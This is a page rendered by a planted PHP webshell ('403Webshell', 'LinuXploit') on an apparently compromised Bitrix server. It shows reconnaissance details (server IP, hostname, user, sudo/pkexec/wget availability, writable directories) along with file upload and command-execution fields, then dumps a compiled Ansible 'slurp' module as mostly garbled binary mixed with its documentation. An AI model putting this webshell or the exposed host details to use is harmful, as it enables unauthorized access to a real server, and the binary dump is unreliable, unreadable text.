403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib/python3.11/site-packages/ansible/modules/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/python3.11/site-packages/ansible/modules/__pycache__/slurp.cpython-311.opt-1.pyc
�

���c����ddlmZmZmZeZdZdZdZddl	Z	ddl
Z
ddlZddlm
Z
ddlmZd�Zed	kre��dSdS)
�)�absolute_import�division�print_functiona�
---
module: slurp
version_added: historical
short_description: Slurps a file from remote nodes
description:
     - This module works like M(ansible.builtin.fetch). It is used for fetching a base64-
       encoded blob containing the data in a remote file.
     - This module is also supported for Windows targets.
options:
  src:
    description:
      - The file on the remote system to fetch. This I(must) be a file, not a directory.
    type: path
    required: true
    aliases: [ path ]
extends_documentation_fragment:
    - action_common_attributes
attributes:
  check_mode:
    support: full
  diff_mode:
    support: none
  platform:
    platforms: posix, windows
notes:
   - This module returns an 'in memory' base64 encoded version of the file, take
     into account that this will require at least twice the RAM as the original file size.
seealso:
- module: ansible.builtin.fetch
author:
    - Ansible Core Team
    - Michael DeHaan (@mpdehaan)
a!
- name: Find out what the remote machine's mounts are
  ansible.builtin.slurp:
    src: /proc/mounts
  register: mounts

- name: Print returned information
  ansible.builtin.debug:
    msg: "{{ mounts['content'] | b64decode }}"

# From the commandline, find the pid of the remote machine's sshd
# $ ansible host -m ansible.builtin.slurp -a 'src=/var/run/sshd.pid'
# host | SUCCESS => {
#     "changed": false,
#     "content": "MjE3OQo=",
#     "encoding": "base64",
#     "source": "/var/run/sshd.pid"
# }
# $ echo MjE3OQo= | base64 -d
# 2179
aW
content:
    description: Encoded file content
    returned: success
    type: str
    sample: "MjE3OQo="
encoding:
    description: Type of encoding used for file
    returned: success
    type: str
    sample: "base64"
source:
    description: Actual path of file slurped
    returned: success
    type: str
    sample: "/var/run/sshd.pid"
N)�
AnsibleModule)�	to_nativec	��tttdddg������d���}|jd}	t|d��5}|���}ddd��n#1swxYwYn�#t
tf$r�}|jtjkrd|z}nJ|jtj	krd	|z}n/|jtj
krd
|z}ndt|d�
��z}|�|��Yd}~nd}~wwxYwtj|��}|�||d���dS)N�pathT)�type�required�aliases)�src)�
argument_spec�supports_check_moder
�rbzfile not found: %szfile is not readable: %sz,source is a directory and must be a file: %szunable to slurp file: %s�surrogate_then_replace)�errors�base64)�content�source�encoding)r�dict�params�open�read�IOError�OSError�errno�ENOENT�EACCES�EISDIRr�	fail_jsonr�	b64encode�	exit_json)�moduler�	source_fh�source_content�e�msg�datas       �:/usr/lib/python3.11/site-packages/ansible/modules/slurp.py�mainr+]s���
���&�4�&��B�B�B�
�
�
�!�	���F��]�5�
!�F�
�
�&�$�
�
�	.�9�&�^�^�-�-�N�	.�	.�	.�	.�	.�	.�	.�	.�	.�	.�	.����	.�	.�	.�	.����W��
�
�
��7�e�l�"�"�&��/�C�C�
�W���
$�
$�,�v�5�C�C�
�W���
$�
$�@�6�I�C�C�,�y��C[�/\�/\�/\�\�C�����������������
������N�+�+�D�
���T�&�8��D�D�D�D�Ds<�A<�A0�$A<�0A4�4A<�7A4�8A<�<D�
A:D�D�__main__)�
__future__rrrr
�
__metaclass__�
DOCUMENTATION�EXAMPLES�RETURNrr�os�ansible.module_utils.basicr�+ansible.module_utils.common.text.convertersrr+�__name__��r*�<module>r8s���A�@�@�@�@�@�@�@�@�@��
�!�
�F��,
��$�
�
�
�����	�	�	�	�4�4�4�4�4�4�A�A�A�A�A�A�E�E�E�:�z����D�F�F�F�F�F��r7

Youez - 2016 - github.com/yon3zu
LinuXploit